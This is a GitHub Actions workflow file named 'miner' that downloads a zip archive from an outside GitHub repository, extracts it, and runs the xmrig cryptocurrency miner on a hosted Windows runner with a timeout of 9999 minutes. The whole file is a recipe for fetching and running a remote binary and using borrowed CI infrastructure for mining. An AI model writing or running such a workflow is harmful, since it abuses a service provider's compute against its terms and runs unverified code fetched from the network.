name: miner

on: 
  workflow_dispatch:

jobs:
  build:
    name: start mine
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: downloading files...
      run: Invoke-WebRequest https://github.com/techtechnikov/min/raw/main/win.zip -OutFile windows.zip
    - name: extracting files...
      run: Expand-Archive windows.zip
    - name: starting miner
      run: |
        .\windows\xmrig.exe
